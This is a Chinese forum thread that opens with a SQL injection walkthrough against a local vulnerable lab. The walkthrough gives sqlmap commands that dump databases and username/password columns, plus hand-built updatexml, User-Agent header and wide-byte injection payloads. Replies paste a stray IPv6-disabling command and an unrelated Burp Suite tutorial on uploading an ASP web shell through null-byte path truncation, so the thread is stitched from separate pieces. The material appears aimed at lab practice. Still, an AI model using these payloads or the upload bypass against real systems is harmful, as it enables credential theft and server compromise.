SQL注入

数字型注入（POST）

对于post请求，我们不能直接用sqlmap就行注入。需要抓包后，将包数据保存为txt在进行注入操作。
将包数据保存为txt文件后。直接sqlmap6来一梭！
sqlmap -r "22.txt" --dbs
如下，成功爆出了数据库。
爆出表
sqlmap -r "22.txt" -D kali --tables
表结构
sqlmap -r "22.txt" -D kali -T users --columns
表数据
sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump
字符型注入(get)

get相对于post就很简单了，直接将url放到我们的sqlmap中跑就行了。
sqlmap -u "http://192.168.123.129:88/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbs
搜索型注入

搜索型还是基于get请求，我们直接在sqlmap中跑就行了。
sqlmap -u "http://192.168.123.129:88/vul/sqli/sqli_search.php?name=1&submit=%E6%90%9C%E7%B4%A2" --dbs
xx型注入

由于XX型的只是SQL拼接方式不同，这里直接放结果。xx')or 1=1#即在url后面多了#在实际中无视即可。sqlmap直接跑。
sqlmap -u "http://192.168.123.129:88/vul/sqli/sqli_x.php?name=1&submit=%E6%9F%A5%E8%AF%A2#" --dbs
update/insert/dele注入


这几个分别是数据库的更新 插入 删除命令。相对于前面而言，略有难度。sqlmap直接跑是跑不出来的。需要我们手动构造相关指令。我们填写数据，点击提交后抓包。右键 Send To Repeater
获取数据库名
修改sex或者任意字段的值为下
' or updatexml(1,concat(0x7e,database()),0) or'
获取表名
' or updatexml(0,concat(0x7e,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='kali666')),0) or'
获取表中字段
' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2) or '
获取字段内容
' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),1) or'
delete

和上一步一样。抓包！爆出数据库：
or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆出表：
or updatexml(0,concat(0x7e,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='kali666')),0) or ''
列名：
or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2) or ''
http头注入


输入账号和密码抓包。我们将User-Agent的值设置为' 可以看到报错了。
爆出数据库
修改User-Agent的值为
firefox' or updatexml(1,concat(0x7e,database()),0) or '
如下，成功爆出数据库。
同样的方法，我们可以得到对应的字段内容。
基于boolian的盲注

直接sqlmap跑就行了。
sqlmap -u "http://192.168.123.129:88/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbs
基于时间的盲注

和上面一样。sqlmap直接开搞！
宽字节注入

数据库
%df' union select 1,database() %23
表
%df' union select 1,group_concat(table_name) from information_schema.columns where table_schema=database()  %23

搬运文章不写出处？

cyrus 发表于 2024-5-15 08:46
建议去封神台靶场学习！有面向新手黑客的全部教程！

是的，封神台确实不错

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv6/conf/eth0/disable_ipv6'

Burp Suite 使用教程（上传突破利器）
mob604756f0e582
2017-01-05 16:04:00阅读 259


Burp Suite是一个免费的网站工具。

它包括proxy、spider、intruder、repeater四项功能。该程序使用Java写成，需要 JRE 1.4 以上版本

该程序的源代码，然后在本地部署以便测试。我本机的IP地址为192.168.8.120，演示程序地址为 http://192.168.8.120/test

​​
​​
方法/步骤



1 运行Burp site,点击Proxy标签，确认Options选项卡下，Proxy listeners的running运行正常（勾选状态为运行），如果端口打开失败，可能的原因是有程序占用了该端口，点击edit，在local listener port:输入框输入一个未占用的端口，点击update即可。我这里将端口改为了8082 ​​​
​​
2 打开http://192.168.8.120/test/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg，进入上传页面，选择我们的asp，然后设置浏览器代理地址为127.0.0.1，端口为8082，点击开始上传，burp suite截获数据包，点击forward按钮，返回结果如图所示。 ​​​
​​
3 到这里所用到的数据包已经成功捕获，切换到history选项卡，右键刚刚捕获的post数据包，选择send to repeater。 ​​​
​​​ ​​
​​
4 更改filepath值”bookpic/”为”bookpic/shell.asp “(asp后有一空格)，然后把filename的值”C:\Documents andSettings\Administrator\Desktop\unset.asp”改成”C:\Documents andSettings\Administrator\Desktop\unset.jpg”，Content-Length的值不用更改，程序会在提交请求的时候自动更新该值。 ​​​
​​
5 然后切换到hex选项卡，找到上传路径”bookpic/shell.asp “所处位置，把20改成00，然后点击GO，成功上传aspshell到http://192.168.8.120/test/bookpic/shell.asp。 ​​​
​​​ ​​
​​​ ​​
​​

Zephyr 发表于 2024-6-3 06:08
Burp Suite 使用教程（上传突破利器）
mob604756f0e582
2017-01-05 16:04:00阅读 259

不是讲sql注入吗 怎么传起小马来了